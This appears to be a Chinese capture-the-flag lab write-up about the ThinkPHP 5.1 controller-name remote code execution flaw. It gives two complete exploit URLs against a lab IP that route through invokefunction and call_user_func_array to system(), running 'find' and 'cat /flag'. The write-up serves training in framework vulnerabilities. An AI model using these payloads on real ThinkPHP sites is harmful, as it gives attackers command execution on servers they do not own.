打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
ThinkPHP5框架漏洞

PHP_RCE

【实验原理】

ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。

【实验目的】

掌握框架漏洞

【实验环境】

Windows

【实验工具】

firefox

【实验步骤】

1.根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1

2.此版本存在getshell漏洞(百度一下poc一抓一大把)

3.查找flag

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

4.查看flag,如图所示

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
ThinkPHP框架漏洞总结
php是不是彻底凉了?2021年主流使用的php框架有哪些?
ThinkPHP教程
微信登陆 (微信PC扫码授权登陆) 简单的php代码
ThinkPHP SQL注入安全漏洞补丁20141212 [1219更新]
解决thinkphp验证码不显示
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服